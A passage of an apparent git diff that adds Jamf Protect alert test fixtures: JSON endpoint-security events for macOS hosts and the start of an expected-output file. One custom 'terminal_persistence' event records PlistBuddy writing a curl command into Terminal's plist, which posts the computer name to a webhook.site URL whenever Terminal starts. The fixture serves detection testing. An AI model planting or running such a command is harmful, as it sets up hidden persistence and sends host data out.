23D56)","ips":["175.16.199.3"],"serial":"Z41L97RNJT","hostname":"VMAC-41L97RNJT","protectVersion":"5.1.3.4","provisioningUDID":"0000FE00-2134CAD3E728E967"},"match":{"tags":[],"uuid":"4ecfd2ae-0f05-4b5d-8079-85f43d72ccf4","event":{"dev":16777235,"gid":20,"pid":4645,"uid":501,"path":"/Users/john/Library/Preferences/com.apple.Terminal.plist","type":4,"uuid":"f3d53a7a-0946-4051-9ca7-0f1133f64d44","iNode":283232,"eventID":94737,"prevFile":null,"timestamp":1706707853.090055},"facts":[{"name":"terminal_persistence","tags":[],"uuid":"3184a930-51cb-490b-862a-631984ffdd61","human":"","actions":[{"name":"CacheFile"},{"name":"Report"}],"context":[{"name":"Test","value":"curl -X POST -H Content-Type: application/json -d {\"computer_name\": \"VMAC-41L97RNJT\"} https://webhook.site/33654518-7909-455f-ab94-2b981036b12e","valueType":"String"}],"version":0,"severity":0}],"custom":true,"actions":[{"name":"CacheFile"},{"name":"Report"}],"context":[{"name":"Test","value":"curl -X POST -H Content-Type: application/json -d {\"computer_name\": \"VMAC-41L97RNJT\"} https://webhook.site/33654518-7909-455f-ab94-2b981036b12e","valueType":"String"}],"severity":0},"related":{"files":[{"gid":20,"uid":501,"fsid":16777235,"mode":33152,"path":"/Users/john/Library/Preferences/com.apple.Terminal.plist","size":29235,"inode":283232,"xattrs":[],"changed":1706707853,"created":1706706812,"sha1hex":"4410ab912212c5e196f063b5bb62b837c334e78d","accessed":1706707839,"modified":1706707853,"sha256hex":"9ea2625bca753b36d358be22abb4ca672a538b80ec2b9de527f6beb2c961e245","isDownload":false,"objectType":"GPSystemObject","isAppBundle":false,"isDirectory":false,"signingInfo":{"appid":"","status":-67062,"teamid":"","signerType":4,"authorities":[],"entitlements":[],"statusMessage":"code object is not signed at 
all"},"isScreenShot":false}],"users":[{"uid":501,"name":"john","uuid":"Z41L97RNJT1f5"},{"uid":0,"name":"root","uuid":"Z41L97RNJT0"}],"groups":[{"gid":20,"name":"staff","uuid":"Z41L97RNJT14"},{"gid":0,"name":"wheel","uuid":"Z41L97RNJT0"}],"binaries":[{"gid":0,"uid":0,"fsid":16777235,"mode":33261,"path":"/usr/libexec/PlistBuddy","size":172944,"inode":1152921500312512000,"xattrs":[],"changed":1705043980,"created":1705043980,"sha1hex":"4f6dcbbb78f2015ce796756638bfa8ae3831d5ca","accessed":1705043980,"modified":1705043980,"sha256hex":"5f9a5f0fde9f19d3493100d85a4faa9e2f7f08112ec4bd82a7dce4ea69de0f4e","isDownload":false,"objectType":"GPSystemObject","isAppBundle":false,"isDirectory":false,"signingInfo":{"appid":"com.apple.PlistBuddy","cdhash":"Pe0mLw80dA9JhyUi6NwOQ1HUCIg=","status":0,"teamid":"","signerType":0,"authorities":["Software Signing","Apple Code Signing Certification Authority","Apple Root CA"],"entitlements":[],"statusMessage":"No error.","informationStage":"extended"},"isScreenShot":false},{"gid":0,"uid":0,"fsid":16777235,"mode":33261,"path":"/bin/zsh","size":1377584,"inode":1152921500312509300,"xattrs":[],"changed":1705043980,"created":1705043980,"sha1hex":"c31a403b3ee1dd54687ac76e8148ebe63efa6c79","accessed":1705043980,"modified":1705043980,"sha256hex":"7c1e6c42ee5929a7c00541df426f1daca4b0e4badd651fc4d5d31dae12ed4ae5","isDownload":false,"objectType":"GPSystemObject","isAppBundle":false,"isDirectory":false,"signingInfo":{"appid":"com.apple.zsh","cdhash":"pYH97FjkFzzp4d/qQ19W3VBlRso=","status":0,"teamid":"","signerType":0,"authorities":["Software Signing","Apple Code Signing Certification Authority","Apple Root CA"],"entitlements":[],"statusMessage":"No 
error.","informationStage":"extended"},"isScreenShot":false},{"gid":0,"uid":0,"fsid":16777235,"mode":33261,"path":"/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal","size":2222704,"inode":1152921500311913500,"xattrs":[],"changed":1705043980,"created":1705043980,"sha1hex":"5550c411a1ffaa049a1f567fe1ca328eb4c6136f","accessed":1705043980,"modified":1705043980,"sha256hex":"632d75df346a43181dee53823a97e9947a9588be5665a5630acb92b6346002f3","isDownload":false,"objectType":"GPSystemObject","isAppBundle":false,"isDirectory":false,"signingInfo":{"appid":"com.apple.Terminal","cdhash":"j6TTFNtMluURvtl5bNlNBpr3C94=","status":0,"teamid":"","signerType":0,"authorities":["Software Signing","Apple Code Signing Certification Authority","Apple Root CA"],"entitlements":[],"statusMessage":"No error.","informationStage":"extended"},"isScreenShot":false}],"processes":[{"gid":20,"pid":4645,"tty":"/dev/ttys000","uid":501,"args":["/usr/libexec/PlistBuddy","-c","Set :\"Window Settings\":Basic:CommandString 'curl -X POST -H \"Content-Type: application/json\" -d \"{\\\"computer_name\\\": \\\"VMAC-41L97RNJT\\\"}\" https://webhook.site/33654518-7909-455f-ab94-2b981036b12e'","/Users/john/Library/Preferences/com.apple.Terminal.plist"],"name":"PlistBuddy","path":"/usr/libexec/PlistBuddy","ppid":4204,"rgid":20,"ruid":501,"uuid":"76d0dd90-7aa2-418a-8f87-f3b21a83bb6c","flags":[],"objectType":"GPSystemObject","processType":"GPSystemObject","signingInfo":{"appid":"com.apple.PlistBuddy","cdhash":"Pe0mLw80dA9JhyUi6NwOQ1HUCIg=","status":0,"teamid":"","signerType":0,"authorities":["Software Signing","Apple Code Signing Certification Authority","Apple Root CA"],"entitlements":[],"statusMessage":"No 
error.","informationStage":"extended"},"groupLeaderPID":4645,"inheritedFlags":[],"responsiblePID":3555,"startTimestamp":1706707853,"isPlatformBinary":true,"originalParentPID":4204,"processIdentifier":12032},{"gid":20,"pid":4204,"uid":501,"args":["/bin/zsh","-zsh"],"name":"zsh","path":"/bin/zsh","ppid":null,"rgid":20,"ruid":501,"uuid":"8afa3e04-ab59-48f1-87fa-bd42b2b1e71c","flags":[],"objectType":"GPSystemObject","processType":"GPSystemObject","signingInfo":{"appid":"com.apple.zsh","cdhash":"pYH97FjkFzzp4d/qQ19W3VBlRso=","status":0,"teamid":"","signerType":0,"authorities":["Software Signing","Apple Code Signing Certification Authority","Apple Root CA"],"entitlements":[],"statusMessage":"No error.","informationStage":"extended"},"groupLeaderPID":null,"inheritedFlags":[],"responsiblePID":3555,"startTimestamp":1706706702,"isPlatformBinary":true,"processIdentifier":10878},{"gid":20,"pid":3555,"uid":501,"args":["/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal"],"name":"Terminal","path":"/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal","ppid":null,"rgid":20,"ruid":501,"uuid":"9508ca43-ad50-408c-a959-8131ac29bbf2","flags":[],"appPath":"/System/Applications/Utilities/Terminal.app","objectType":"GPSystemObject","processType":"GPSystemObject","signingInfo":{"appid":"com.apple.Terminal","cdhash":"j6TTFNtMluURvtl5bNlNBpr3C94=","status":0,"teamid":"","signerType":0,"authorities":["Software Signing","Apple Code Signing Certification Authority","Apple Root CA"],"entitlements":[],"statusMessage":"No error.","informationStage":"extended"},"groupLeaderPID":null,"inheritedFlags":[],"responsiblePID":3555,"startTimestamp":1706706139,"isPlatformBinary":true,"processIdentifier":9395}]},"eventType":"GPFSEvent"}} +{"caid":"9344154b2323cbfdca098e408354212d4331ac3e9e538497aba0f766723661f7","certid":"312301bd32f3fc8f82c7d6e57814764ae751f171f37496407d8998a32892bcea","input":{"host":{"os":"Version 14.2 (Build 
23C5030f)","ips":["175.16.199.4"],"serial":"C02ZW0GTLVDL","hostname":"LMAC-ZW0GTLVDL","protectVersion":"5.1.3.4","provisioningUDID":"32EC79C5-26DC-535A-85F7-986F063297E2"},"match":{"tags":["MITREattack","BootOrLogonAutostartExecution","T1547","Visibility","Persistence"],"uuid":"0090c24f-dcab-44f0-9395-1c2f5e688d4b","event":{"dev":16777221,"gid":20,"pid":64885,"uid":501,"path":"/Applications/Setapp.app","type":3,"uuid":"03fedbe6-7160-47f0-b05b-5eddb070c1c9","iNode":22894871,"eventID":114853,"prevFile":"/Users/thijs/Library/Caches/com.setapp.DesktopClient/org.sparkle-project.Sparkle/Installation/jmPimIOZQ/Setapp.app","timestamp":1706141601.459138},"facts":[{"name":"DockTileAdded","tags":["Persistence","BootOrLogonAutostartExecution","MITREattack","T1547"],"uuid":"24fcb4dc-5720-422d-9801-42b1e7b7b291","human":"New Dock Tile registered","actions":[{"name":"Report"},{"name":"CacheFile"}],"context":[{"name":"Plugin Name","value":"DockTilePlugIn.docktileplugin","valueType":"String"}],"version":1,"severity":1},{"name":"CustomURLHandlerCreation","tags":["Visibility"],"uuid":"25a295ca-f4b3-4f78-8faa-80e9182645f1","human":"Application that uses custom url handler created","actions":[{"name":"CacheFile"},{"name":"Report"}],"context":[{"name":"BundleURLTypes","value":"{\n CFBundleTypeRole = Editor;\n CFBundleURLName = \"Setapp Discovery\";\n CFBundleURLSchemes = (\n setappDiscovery\n );\n}","valueType":"String"},{"name":"Signer","value":"2","valueType":"String"}],"version":1,"severity":0}],"custom":false,"actions":[{"name":"CacheFile"},{"name":"Report"}],"context":[{"name":"BundleURLTypes","value":"{\n CFBundleTypeRole = Editor;\n CFBundleURLName = \"Setapp Discovery\";\n CFBundleURLSchemes = (\n setappDiscovery\n );\n}","valueType":"String"},{"name":"Signer","value":"2","valueType":"String"},{"name":"Plugin 
Name","value":"DockTilePlugIn.docktileplugin","valueType":"String"}],"severity":1},"related":{"files":[{"gid":20,"uid":501,"fsid":16777221,"mode":16877,"path":"/Applications/Setapp.app","size":96,"inode":22894871,"xattrs":["com.apple.macl"],"changed":1706141601,"created":1705697281,"sha1hex":"","accessed":1706141601,"modified":1706141601,"sha256hex":"","isDownload":false,"objectType":"GPSystemObject","isAppBundle":true,"isDirectory":true,"signingInfo":{"appid":"com.setapp.DesktopClient","cdhash":"qvvsGItML7v58RDPg/X5hVTNpnc=","status":0,"teamid":"MEHY5QF425","signerType":2,"authorities":["Developer ID Application: Setapp Limited (MEHY5QF425)","Developer ID Certification Authority","Apple Root CA"],"entitlements":[],"statusMessage":"No error."},"isScreenShot":false}],"users":[{"uid":501,"name":"","uuid":"C02ZW0GTLVDL1f5"}],"groups":[{"gid":20,"name":"","uuid":"C02ZW0GTLVDL14"}],"binaries":[{"gid":20,"uid":501,"fsid":16777221,"mode":33261,"path":"/Users/thijs/Library/Application Support/Setapp/LaunchAgents/SetappUpdater.app/Contents/Frameworks/Sparkle.framework/Versions/B/Autoupdate","size":644320,"inode":22649007,"xattrs":[],"changed":1705545903,"created":1704995932,"sha1hex":"e9a46b7ad0356aa655baa324d67b6abc762820df","accessed":1706141343,"modified":1704995932,"sha256hex":"f6d8bd4d2864ec71c6628fe803458da6d7737575cde62e5044645de692e9e748","isDownload":false,"objectType":"GPSystemObject","isAppBundle":false,"isDirectory":false,"signingInfo":{"appid":"Autoupdate-555549446afbe33f0c8f39a58f46e1bd35e14c86","cdhash":"7hIQIEZBRQk0gujH3AlD7AhJaMY=","status":0,"teamid":"MEHY5QF425","signerType":2,"authorities":["Developer ID Application: Setapp Limited (MEHY5QF425)","Developer ID Certification Authority","Apple Root CA"],"entitlements":[],"statusMessage":"No error."},"isScreenShot":false}],"processes":[{"gid":20,"pid":64885,"uid":501,"args":["/Users/thijs/Library/Application 
Support/Setapp/LaunchAgents/SetappUpdater.app/Contents/Frameworks/Sparkle.framework/Versions/B/Autoupdate","com.setapp.DesktopClient","/Users/thijs","thijs"],"name":"Autoupdate","path":"/Users/thijs/Library/Application Support/Setapp/LaunchAgents/SetappUpdater.app/Contents/Frameworks/Sparkle.framework/Versions/B/Autoupdate","ppid":1,"rgid":20,"ruid":501,"uuid":"b1b340e9-4fd9-4cdf-8602-cf7796828926","flags":[],"objectType":"GPSystemObject","processType":"GPSystemObject","signingInfo":{"appid":"Autoupdate-555549446afbe33f0c8f39a58f46e1bd35e14c86","cdhash":"7hIQIEZBRQk0gujH3AlD7AhJaMY=","status":0,"teamid":"MEHY5QF425","signerType":2,"authorities":["Developer ID Application: Setapp Limited (MEHY5QF425)","Developer ID Certification Authority","Apple Root CA"],"entitlements":[],"statusMessage":"No error.","informationStage":"extended"},"groupLeaderPID":64885,"inheritedFlags":[],"responsiblePID":64885,"startTimestamp":1706141342,"isPlatformBinary":false,"originalParentPID":1,"processIdentifier":1808779}]},"eventType":"GPFSEvent"}} +{"caid":"9344154b2323cbfdca098e408354212d4331ac3e9e538497aba0f766723661f7","certid":"312301bd32f3fc8f82c7d6e57814764ae751f171f37496407d8998a32892bcea","input":{"host":{"os":"Version 14.2 (Build 23C5030f)","ips":["175.16.199.5"],"serial":"C02ZW0GTLVDL","hostname":"LMAC-ZW0GTLVDL","protectVersion":"5.1.3.4","provisioningUDID":"32EC79C5-26DC-535A-85F7-986F063297E2"},"match":{"tags":["Visibility"],"uuid":"db492c7c-a301-43ab-afa3-fc02f661918f","event":{"type":0,"uuid":"4ff5757b-5ba8-460d-97f8-3689a76a7bc0","device":{"size":15376000000,"unit":1,"isLeaf":false,"bsdName":"disk3","bsdUnit":3,"busName":"XHC3","busPath":"IODeviceTree:/PCI0@0/RP09@1D/UPSB@0/DSB2@2/XHC3@0","content":"GUID_partition_scheme","isWhole":true,"bsdMajor":1,"bsdMinor":13,"protocol":"USB","revision":"1.00","vendorId":"0x0781","blockSize":512,"mediaKind":"IOMedia","mediaName":"SanDisk Ultra USB 3.0 
Media","mediaPath":"IODeviceTree:/PCI0@0/RP09@1D/UPSB@0/DSB2@2/XHC3@0/@1:0","productId":"0x5595","devicePath":"IOService:/AppleACPIPlatformExpert/PCI0@0/AppleACPIPCI/RP09@1D/IOPP/UPSB@0/IOPP/DSB2@2/IOPP/XHC3@0/XHC3@01000000/SSP1@01100000/Ultra USB 3.0@01100000/IOUSBHostInterface@0/IOUSBMassStorageInterfaceNub/IOUSBMassStorageDriverNub/IOUSBMassStorageDriver/IOSCSILogicalUnitNub@0/IOSCSIPeripheralDeviceType00/IOBlockStorageServices","isInternal":false,"isWritable":true,"vendorName":"SanDisk","deviceClass":0,"deviceModel":"Ultra USB 3.0","isEjectable":true,"isEncrypted":false,"isMountable":false,"isRemovable":true,"productName":"Ultra USB 3.0","serialNumber":"4C531001410227100573","deviceSubClass":0,"isNetworkVolume":false,"encryptionDetail":0},"timestamp":1705519180.1462169,"usbAddress":1},"facts":[{"name":"USBInserted","tags":["Visibility"],"uuid":"b4fe77b3-f8d3-483d-ba29-ea2e1a5c44ea","human":"USB device inserted","actions":[{"name":"Report"}],"context":[],"version":1,"severity":0}],"custom":false,"actions":[{"name":"Report"}],"context":[],"severity":0},"related":{"files":[],"users":[],"groups":[],"binaries":[],"processes":[]},"eventType":"GPUSBEvent"}} +{"caid":"9344154b2323cbfdca098e408354212d4331ac3e9e538497aba0f766723661f7","certid":"312301bd32f3fc8f82c7d6e57814764ae751f171f37496407d8998a32892bcea","input":{"host":{"os":"Version 14.0 (Build 
23A344)","ips":["175.16.199.6"],"serial":"Z2C23RW4DY","hostname":"VMAC-2C23RW4DY","protectVersion":"5.0.2.2","provisioningUDID":"0000FE00-8406CE28ECFC4DAB"},"match":{"tags":[],"uuid":"7288b17d-d2d1-4de7-b76a-df3529cfe0a8","event":{"path":"/Users/local-admin/Downloads/JamfConnect-2.27.0.dmg","uuid":"5ff8ca5c-7e37-4610-8325-7fbddeea31cd","timestamp":1695888798.877483},"facts":[{"name":"new_downloads","tags":[],"uuid":"e5faa7fe-a10b-461c-9bc3-b3080bb59f4a","human":"","actions":[{"name":"Report","parameters":{}}],"context":[],"version":0,"severity":0}],"custom":true,"actions":[{"name":"Report","parameters":{}}],"context":[],"severity":0},"related":{"files":[{"gid":20,"uid":501,"fsid":16777232,"mode":33188,"path":"/Users/local-admin/Downloads/JamfConnect-2.27.0.dmg","size":35249769,"inode":3900740,"xattrs":["com.apple.macl","com.apple.metadata:kMDItemDownloadedDate","com.apple.metadata:kMDItemWhereFroms","com.apple.quarantine"],"changed":1695888797,"created":1695888795,"sha1hex":"0a5f0aa7cbe904e687341e2eee453348e3a3760d","accessed":1695888795,"modified":1695888797,"sha256hex":"f7688a83f2c508c16128bd512e1d57b122824001a0c560b12b63c26d3cb7f4a0","isDownload":true,"objectType":"GPSystemObject","isAppBundle":false,"isDirectory":false,"signingInfo":{"appid":"JamfConnect-2","cdhash":"sqTVmnuWCrCwmriUwwrilesPYME=","status":0,"teamid":"483DWKW443","signerType":2,"authorities":["Developer ID Application: JAMF Software (483DWKW443)","Developer ID Certification Authority","Apple Root CA"],"entitlements":[],"statusMessage":"No error."},"isScreenShot":false,"downloadedFrom":["https://files.jamfconnect.com/JamfConnect.dmg"]}],"users":[{"uid":501,"name":"local-admin","uuid":"Z2C23RW4DY1f5"}],"groups":[{"gid":20,"name":"staff","uuid":"Z2C23RW4DY14"}],"binaries":[],"processes":[]},"eventType":"GPDownloadEvent"}} 
+{"caid":"9344154b2323cbfdca098e408354212d4331ac3e9e538497aba0f766723661f7","certid":"312301bd32f3fc8f82c7d6e57814764ae751f171f37496407d8998a32892bcea","input":{"eventType":"GPUnifiedLogEvent","host":{"hostname":"PCJVW6XJGM","ips":["175.16.199.7"],"os":"Version 13.6.1 (Build 22G313)","protectVersion":"5.1.0.4","provisioningUDID":"00006000-000678310153401E","serial":"PCJVW6XJGM"},"match":{"actions":[{"name":"Report"}],"context":[],"custom":false,"event":{"category":"XPEvent.structured","composedMessage":"{\"caused_by\":[],\"status_message\":\"NoThreatDetected\",\"status_code\":20,\"execution_duration\":0.7135159969329834}","name":"XProtect Remediator Scan Activity","process":"XProtectRemediatorGreenAcre","processIdentifier":6925,"processImagePath":"/Library/Apple/System/Library/CoreServices/XProtect.app/Contents/MacOS/XProtectRemediatorGreenAcre","sender":"XProtectRemediatorGreenAcre","senderImagePath":"/Library/Apple/System/Library/CoreServices/XProtect.app/Contents/MacOS/XProtectRemediatorGreenAcre","subsystem":"com.apple.XProtectFramework.PluginAPI","tags":["XProtect Remediator"],"timestamp":1699432944.315508,"uuid":"D64D34FA-D426-48A3-BFD3-286776C34618"},"facts":[{"actions":[{"name":"Report"}],"context":[],"human":"XProtect Remediator Scan Activity","name":"XProtect Remediator Scan Activity","severity":0,"tags":["XProtect Remediator"],"uuid":"48C46122-898D-412D-A728-F8939F0F8017"}],"severity":0,"tags":["XProtect Remediator"],"uuid":"7E46E4CD-0999-44C7-8EEE-6AC21876126E"}}} +{"caid":"9344154b2323cbfdca098e408354212d4331ac3e9e538497aba0f766723661f7","certid":"312301bd32f3fc8f82c7d6e57814764ae751f171f37496407d8998a32892bcea","input":{"eventType":"GPUnifiedLogEvent","host":{"hostname":"PCJVW6XJGM","ips":["175.16.199.8"],"os":"Version 13.6.1 (Build 
22G313)","protectVersion":"5.1.0.4","provisioningUDID":"00006000-000678310153401E","serial":"PCJVW6XJGM"},"match":{"actions":[{"name":"Report"}],"context":[],"custom":false,"event":{"category":"XPEvent.structured","composedMessage":"{\"caused_by\":[],\"status_message\":\"NoThreatDetected\",\"status_code\":20,\"execution_duration\":0.7135159969329834}","name":"XProtect Remediator Scan Activity","process":"XProtectRemediatorGreenAcre","processIdentifier":6925,"processImagePath":"/Library/Apple/System/Library/CoreServices/XProtect.app/Contents/MacOS/XProtectRemediatorGreenAcre","sender":"XProtectRemediatorGreenAcre","senderImagePath":"/Library/Apple/System/Library/CoreServices/XProtect.app/Contents/MacOS/XProtectRemediatorGreenAcre","subsystem":"com.apple.XProtectFramework.PluginAPI","tags":["XProtect Remediator"],"timestamp":1699432944.315508,"uuid":"D64D34FA-D426-48A3-BFD3-286776C34618"},"facts":[{"actions":[{"name":"Report"}],"context":[],"human":"XProtect Remediator Scan Activity","name":"XProtect Remediator Scan Activity","severity":0,"tags":["XProtect Remediator"],"uuid":"48C46122-898D-412D-A728-F8939F0F8017"}],"severity":0,"tags":["XProtect Remediator"],"uuid":"7E46E4CD-0999-44C7-8EEE-6AC21876126E"}}} +{"caid":"095d122988c4e487ef0c538709ce033e2620f9d30751567d24bbf78b085b699c","certid":"ae4ef1351c2ad7535a1c3fde7d2152f3223984a19a8f2eb069bf729e9dc8d279","input":{"eventType":"GPUnifiedLogEvent","host":{"hostname":"mike.test’s MacBook Pro","ips":["175.16.199.9","175.16.199.18"],"os":"Version 14.3 (Build 23D56)","protectVersion":"5.1.3.4","provisioningUDID":"00008103-001C70A61AA2001E","serial":"C02DP1M5Q05P"},"match":{"actions":[{"name":"Report"}],"context":[],"custom":false,"event":{"category":"XPEvent.structured","composedMessage":"{\"execution_duration\":0.0001779794692993164,\"status_code\":20,\"status_message\":\"NoThreatDetected\",\"caused_by\":[]}","name":"XProtect Remediator Scan 
Activity","process":"XProtectRemediatorWaterNet","processIdentifier":4052,"processImagePath":"\/Library\/Apple\/System\/Library\/CoreServices\/XProtect.app\/Contents\/MacOS\/XProtectRemediatorWaterNet","sender":"XProtectRemediatorWaterNet","senderImagePath":"\/Library\/Apple\/System\/Library\/CoreServices\/XProtect.app\/Contents\/MacOS\/XProtectRemediatorWaterNet","subsystem":"com.apple.XProtectFramework.PluginAPI","tags":["XProtect Remediator"],"timestamp":1706744375.695548,"uuid":"A2F90786-46F6-4856-B96F-B9B4F051F785"},"facts":[{"actions":[{"name":"Report"}],"context":[],"human":"XProtect Remediator Scan Activity","name":"XProtect Remediator Scan Activity","severity":0,"tags":["XProtect Remediator"],"uuid":"33F6DAB9-3CE9-4685-A622-68EDAA572D6C"}],"severity":0,"tags":["XProtect Remediator"],"uuid":"CE2F93FE-F786-4BBC-B893-3F98D82488A7"}}} +{"caid":"095d122988c4e487ef0c538709ce033e2620f9d30751567d24bbf78b085b699c","certid":"56e3fe5f85c4aeb8550d4258a337e0618508f7038c3bd02cb1aeec12f072e532","input":{"eventType":"GPUnifiedLogEvent","host":{"hostname":"Mike’s Virtual Machine","ips":["175.16.199.10"],"os":"Version 14.2.1 (Build 23C71)","protectVersion":"5.1.3.4","provisioningUDID":"0000FE00-6AD2C3C48DAB92D4","serial":"ZTG60FLTP3"},"match":{"actions":[{"name":"Report"}],"context":[],"custom":false,"event":{"category":"UserElevation","composedMessage":"User mikevandelinder elevated to admin for stated reason: No reason supplied","name":"JCDaemon TPE Reasoning","process":"JCDaemon","processIdentifier":2618,"processImagePath":"\/Library\/Application Support\/JamfConnect\/JCDaemon.app\/Contents\/MacOS\/JCDaemon","sender":"JCDaemon","senderImagePath":"\/Library\/Application Support\/JamfConnect\/JCDaemon.app\/Contents\/MacOS\/JCDaemon","subsystem":"com.jamf.connect.daemon","tags":[],"timestamp":1706567549.631402,"uuid":"E6FA512E-D2F9-47F2-9B85-7A3EF09493E6"},"facts":[{"actions":[{"name":"Report"}],"context":[],"human":"JCDaemon TPE Reasoning","name":"JCDaemon TPE 
Reasoning","severity":0,"tags":[],"uuid":"7476F070-9DD4-41DA-A782-E935E19E8D6F"}],"severity":0,"tags":[],"uuid":"36E81FA3-A9DA-4050-ABF5-B9738C23A587"}}} +{"caid":"02315cab15112294890e215397052cd73743b887c8264bc468b84df905e67e91","certid":"1f52a5585b7e0905a3f147cf4bdc014422a99247d01e3e51a996d165aecfb9f5","input":{"eventType":"GPUnifiedLogEvent","host":{"hostname":"MBP14-MWARD-SONOMA","ips":["175.16.199.11"],"os":"Version 14.3 (Build 23D56)","protectVersion":"5.1.2.2","provisioningUDID":"00006000-000259581A04401E","serial":"CKV6H2WMFM"},"match":{"actions":[{"name":"Report"}],"context":[],"custom":false,"event":{"category":"Standard","composedMessage":"-[LWAuthServiceManager event:eventHints:reply:] | ======== SCREENLOCK ==== APEventTouchIDMatch =========","name":"LoginWindow TouchID Success","process":"loginwindow","processIdentifier":7695,"processImagePath":"\/System\/Library\/CoreServices\/loginwindow.app\/Contents\/MacOS\/loginwindow","sender":"loginwindow","senderImagePath":"\/System\/Library\/CoreServices\/loginwindow.app\/Contents\/MacOS\/loginwindow","subsystem":"com.apple.loginwindow.logging","tags":["login","touchid"],"timestamp":1706536039.430031,"uuid":"F5E4AAF2-D0C0-47D4-BD89-931DC8A9BDB9"},"facts":[{"actions":[{"name":"Report"}],"context":[],"human":"LoginWindow TouchID Success","name":"LoginWindow TouchID Success","severity":0,"tags":["login","touchid"],"uuid":"E2BD5299-B217-411F-B3C4-1FC2C2DCC106"}],"severity":0,"tags":["login","touchid"],"uuid":"AF42B6FF-66D0-4808-8B4D-D7594D62A79B"}}} diff --git a/packages/jamf_protect/data_stream/alerts/_dev/test/pipeline/test-jamf-protect-alerts-sample-logs.log-expected.json b/packages/jamf_protect/data_stream/alerts/_dev/test/pipeline/test-jamf-protect-alerts-sample-logs.log-expected.json new file mode 100644 index 00000000000..a32a8a17368 --- /dev/null +++ b/packages/jamf_protect/data_stream/alerts/_dev/test/pipeline/test-jamf-protect-alerts-sample-logs.log-expected.json 
@@ -0,0 +1,869 @@ +{ + "expected": [ + { + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "CustomURLHandlerCreation", + "category": [ + "host", + "file" + ], + "id": "6bdb0697-6d07-47bc-a37d-6c3348a5d953", + "kind": "alert", + "provider": "Jamf Protect", + "reason": "Application that uses custom url handler created", + "severity": 0, + "start": "2023-11-21T11:32:44.184Z", + "type": [ + "change" + ] + }, + "file": { + "code_signature": { + "status": "code object is not signed at all" + }, + "gid": "0", + "inode": "19478271", + "mode": "16804", + "path": "/Applications/.Microsoft Teams (work or school).app.installBackup", + "size": 96, + "uid": "0" + }, + "group": { + "id": "0", + "name": "wheel" + }, + "host": { + "hostname": "LMAC-ZW0GTLVDL", + "id": "32EC79C5-26DC-535A-85F7-986F063297E2", + "ip": [ + "175.16.199.1" + ], + "os": { + "family": "macos", + "full": "Version 14.2 (Build 23C5030f)" + } + }, + "observer": { + "product": "Jamf Protect", + "vendor": "Jamf" + }, + "process": { + "args": [ + "/Library/PrivilegedHelperTools/com.microsoft.autoupdate.helper", + "XPC_SERVICE_NAME=com.microsoft.autoupdate.helper", + "PATH=/usr/bin:/bin:/usr/sbin:/sbin", + "XPC_FLAGS=1", + "pfz=0x7ffffff12000", + "stack_guard=0x94bec1a9eb9800ea", + "malloc_entropy=0x7777a3bc060946c0,0x6f95455435250cbc", + "ptr_munge=0x749c1515ccadfca", + "main_stack=0x7ff7bf6da000,0x800000,0x7ff7bb6da000,0x4000000", + "executable_file=0x1a01000009,0x12f5060", + "dyld_file=0x1a01000009,0xfffffff000982f7", + "executable_cdhash=262df85f4455ca182cb45671afb26c9ad9dff13b", + "executable_boothash=1fc9ca7065a4d7a9c299cc51414c052e5d7025d7", + "th_port=0x103" + ], + "code_signature": { + "signing_id": "com.microsoft.autoupdate.helper", + "status": "No error.", + "team_id": "UBF8T346G9" + }, + "entity_id": "b8cd6fa5-e8c3-4f05-88a0-68469d04806c", + "executable": "/Library/PrivilegedHelperTools/com.microsoft.autoupdate.helper", + "group_leader": { + "executable": 
"/Library/PrivilegedHelperTools/com.microsoft.autoupdate.helper", + "name": "com.microsoft.autoupdate.helper", + "pid": 15910, + "real_group": { + "id": "0" + }, + "real_user": { + "id": "0" + }, + "start": "2023-11-21T11:32:44Z", + "user": { + "id": "0" + } + }, + "hash": { + "sha1": "5ddcd49004e66cead79ca82991f1b4d4a8ba52d9", + "sha256": "8fd91d9d1ca53ef93921c8072e12ec082c9eba62bf93f0f900e71b6aa4fa0ed8" + }, + "name": "com.microsoft.autoupdate.helper", + "parent": { + "pid": 15910 + }, + "pid": 15910, + "real_group": { + "id": "0" + }, + "real_user": { + "id": "0" + }, + "start": "2023-11-21T11:32:44Z", + "user": { + "id": "0" + } + }, + "related": { + "hash": [ + "5ddcd49004e66cead79ca82991f1b4d4a8ba52d9", + "8fd91d9d1ca53ef93921c8072e12ec082c9eba62bf93f0f900e71b6aa4fa0ed8" + ], + "ip": [ + "175.16.199.1" + ], + "user": [ + "root" + ] + }, + "tags": [ + "Visibility" + ] + }, + { + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "User Elevated Action", + "category": [ + "host", + "process" + ], + "id": "7232d4a4-2289-49ba-a218-215ef3d62ec4", + "kind": "alert", + "outcome": "success", + "provider": "Jamf Protect", + "reason": "Application used deprecated elevation API", + "severity": 0, + "start": "2023-11-01T12:20:38.851Z", + "type": [ + "start" + ] + }, + "group": { + "id": "0", + "name": "wheel" + }, + "host": { + "hostname": "VMAC-2C23RW4DY", + "id": "0000FE00-8406CE28ECFC4DAB", + "ip": [ + "175.16.199.2" + ], + "os": { + "family": "macos", + "full": "Version 14.0 (Build 23A344)" + } + }, + "observer": { + "product": "Jamf Protect", + "vendor": "Jamf" + }, + "process": { + "args": [ + "/usr/libexec/security_authtrampoline", + "/Library/Application Support/JAMF/Remote Assist/Wipe", + "auth 16" + ], + "code_signature": { + "signing_id": "com.apple.security_authtrampoline", + "status": "No error." 
+ }, + "entity_id": "c821d617-2ce5-4475-aae6-c428a1ad9e8c", + "executable": "/usr/libexec/security_authtrampoline", + "group_leader": { + "executable": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal", + "name": "Terminal", + "pid": 765, + "real_group": { + "id": "20" + }, + "real_user": { + "id": "501" + }, + "start": "2023-11-01T12:11:11Z", + "user": { + "id": "501" + } + }, + "hash": { + "sha1": "82e899cb1c8a42b74653b05ca526d5feae92b9f6", + "sha256": "7528368ce03bd25fb22520923f366e364ea40ae90b22dac79fba90f2152c3d32" + }, + "name": "security_authtrampoline", + "parent": { + "code_signature": { + "signing_id": "com.jamf.remoteassist.launcher", + "status": "No error.", + "team_id": "483DWKW443" + }, + "entity_id": "a382cfda-8964-4388-8c19-49d4eaef2ae7", + "executable": "/Library/Application Support/JAMF/Remote Assist/jamfRemoteAssistLauncher", + "name": "jamfRemoteAssistLauncher", + "pid": 3099, + "real_group": { + "id": "0" + }, + "real_user": { + "id": "0" + }, + "start": "2023-11-01T12:20:36Z", + "user": { + "id": "0" + } + 